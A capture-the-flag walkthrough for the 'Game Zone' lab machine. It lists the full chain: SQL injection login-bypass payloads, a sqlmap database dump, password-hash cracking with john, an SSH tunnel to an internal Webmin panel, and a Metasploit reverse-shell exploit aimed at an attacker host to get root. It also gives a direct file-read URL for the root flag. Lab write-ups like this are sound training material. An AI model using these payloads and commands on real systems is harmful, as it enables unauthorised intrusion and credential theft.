Game Zone

Tasks:

1. Deploy the vulnerable machine:
   1. Do nmap scan with nmap -sV -T5 ip - PORT 22,80 open
   2. Visit ip in browser , do reverse image search and submit answer - agent 47.
2. Obtain access via SQLi:
   1. Use SQLi payload such as ' or 1=1 # or ' or 1=1 -- - in username and login.
   2. You will be redirected to portal.php
3. Using SQLMap:
   1. Search something in website and intercept request using burpsuite, copy the request as a text file request.txt.
   2. Run sqlmap -r request.txt --dump - There are 2 tables users and post, users has 1 user agent47 with hashed password stored in table.
   3. You can use Online Hash Identifier or hashid to detect hash type - SHA256
   4. Use john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 to crack password - videogamer124
   5. ssh using ssh [email protected] and cracked password when prompted - You now have shell, cat user.txt and submit user flag.
4. Exposing services with reverse SSH tunnels:
   1. Run ss -tulpn to get running sockets, port 10000 is open but cannot be accessed from outside due to firewall.
   2. Use ssh -L 10000:localhost:10000 agent47@ip to explose port 10000 locally to ourself (attacker).
   3. Open http://ip:10000 in attacker browser, it's webmin login page, Login using agent47:videogamer124, Version exposed after logging in - 1.580
5. Privilege Escalation with Metasploit:
   1. searchsploit webmin 1.580 to know which metasploit exploit we need to use.
   2. use exploit/unix/webapp/webmin_show_cgi_exec , set RHOSTS 127.0.0.1, set PASSWORD videogamer124, set payload cmd/unix/reverse, set LHOST ATTACKERIP, set LPORT 4444, run
   3. You now have root shell, type cat /root/root.txt to get root flag and submit.
   4. Alternative to metasploit ,search for exploits online in exploit-db , /file/show.cgi allows authenticated users to view file manager as root ,Open http://localhost:10000/file/show.cgi/root/root.txt in browser to get flag and submit.